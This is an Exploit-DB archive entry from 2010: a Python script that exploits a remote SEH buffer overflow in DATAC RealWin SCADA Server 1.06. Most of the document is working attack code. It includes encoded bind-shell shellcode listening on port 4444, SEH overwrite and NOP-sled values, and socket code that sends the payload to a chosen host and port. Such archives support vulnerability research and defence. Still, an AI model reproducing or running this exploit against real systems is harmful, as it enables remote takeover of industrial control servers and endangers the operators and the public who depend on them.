DATAC RealWin SCADA Server 1.06 - Remote Buffer Overflow

EDB-ID:

15337


Author:

blake

Type:

remote


Platform:

Windows

Date:

2010-10-27


# Exploit Title: RealWin SCADA System SEH Overwrite
# Date: 10-27-10
# Author: Blake
# Software Link: http://www.realflex.com/products/realwin/realwin.php
# Version: 1.06
# Tested on: Windows XP SP3 running in VMware Workstation (rfx)

import socket, sys

if len(sys.argv)!= 3:
    print "\n[*] Usage: %s <ip> <port>\n" % sys.argv[0]
    sys.exit(0)
 
host = sys.argv[1]
port = int(sys.argv[2])     # port 912 by default

# windows/shell_bind_tcp - 368 bytes Encoder: x86/shikata_ga_nai
# LPORT=4444, 
shellcode =(
"\xba\xe7\x26\x3b\xa1\x33\xc9\xb1\x56\xdb\xce\xd9\x74\x24\xf4"
"\x5d\x83\xc5\x04\x31\x55\x0b\x03\x55\xec\xc4\xce\x5d\x1a\x81"
"\x31\x9e\xda\xf2\xb8\x7b\xeb\x20\xde\x08\x59\xf5\x94\x5d\x51"
"\x7e\xf8\x75\xe2\xf2\xd5\x7a\x43\xb8\x03\xb4\x54\x0c\x8c\x1a"
"\x96\x0e\x70\x61\xca\xf0\x49\xaa\x1f\xf0\x8e\xd7\xef\xa0\x47"
"\x93\x5d\x55\xe3\xe1\x5d\x54\x23\x6e\xdd\x2e\x46\xb1\xa9\x84"
"\x49\xe2\x01\x92\x02\x1a\x2a\xfc\xb2\x1b\xff\x1e\x8e\x52\x74"
"\xd4\x64\x65\x5c\x24\x84\x57\xa0\xeb\xbb\x57\x2d\xf5\xfc\x50"
"\xcd\x80\xf6\xa2\x70\x93\xcc\xd9\xae\x16\xd1\x7a\x25\x80\x31"
"\x7a\xea\x57\xb1\x70\x47\x13\x9d\x94\x56\xf0\x95\xa1\xd3\xf7"
"\x79\x20\xa7\xd3\x5d\x68\x7c\x7d\xc7\xd4\xd3\x82\x17\xb0\x8c"
"\x26\x53\x53\xd9\x51\x3e\x3c\x2e\x6c\xc1\xbc\x38\xe7\xb2\x8e"
"\xe7\x53\x5d\xa3\x60\x7a\x9a\xc4\x5b\x3a\x34\x3b\x63\x3b\x1c"
"\xf8\x37\x6b\x36\x29\x37\xe0\xc6\xd6\xe2\xa7\x96\x78\x5c\x08"
"\x47\x39\x0c\xe0\x8d\xb6\x73\x10\xae\x1c\x02\x16\x60\x44\x47"
"\xf1\x81\x7a\x76\x5d\x0f\x9c\x12\x4d\x59\x36\x8a\xaf\xbe\x8f"
"\x2d\xcf\x94\xa3\xe6\x47\xa0\xad\x30\x67\x31\xf8\x13\xc4\x99"
"\x6b\xe7\x06\x1e\x8d\xf8\x02\x36\xc4\xc1\xc5\xcc\xb8\x80\x74"
"\xd0\x90\x72\x14\x43\x7f\x82\x53\x78\x28\xd5\x34\x4e\x21\xb3"
"\xa8\xe9\x9b\xa1\x30\x6f\xe3\x61\xef\x4c\xea\x68\x62\xe8\xc8"
"\x7a\xba\xf1\x54\x2e\x12\xa4\x02\x98\xd4\x1e\xe5\x72\x8f\xcd"
"\xaf\x12\x56\x3e\x70\x64\x57\x6b\x06\x88\xe6\xc2\x5f\xb7\xc7"
"\x82\x57\xc0\x35\x33\x97\x1b\xfe\x43\xd2\x01\x57\xcc\xbb\xd0"
"\xe5\x91\x3b\x0f\x29\xac\xbf\xa5\xd2\x4b\xdf\xcc\xd7\x10\x67"
"\x3d\xaa\x09\x02\x41\x19\x29\x07")


head = "\x64\x12\x54\x6A\x20\x00\x00\x00\xF4\x1F\x00\x00"
junk = "\x41" * 228
next_seh = "\xeb\x06\x90\x90"	# overwrites next seh
seh = "\xea\xe3\x02\x40" 		# seh overwritten at 232 bytes - 4002e3ea
nops = "\x90" * 20				# nop sled
junk2 = "\x42" * (7972 - len(shellcode)) # 1740 bytes for shellcode

print "\n====================================" 
print "DATAC RealWin 1.06 Buffer Overflow"
print "Written by Blake"
print "Discovered by Luigi Auriemma"
print "Tested on Windows XP SP3"
print "====================================\n"
 
print "[*] Connecting to %s on port %d" % (host,port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((host,port))
except:
    print "[x] Error establishing connection\n"
    sys.exit(0)
 
print "[*] Sending payload"
s.send(head + junk + next_seh + seh + nops + shellcode + junk2 + "\r\n")
s.close()
print "[*] Payload sent"
raw_input("[*] Press any key to exit...\n")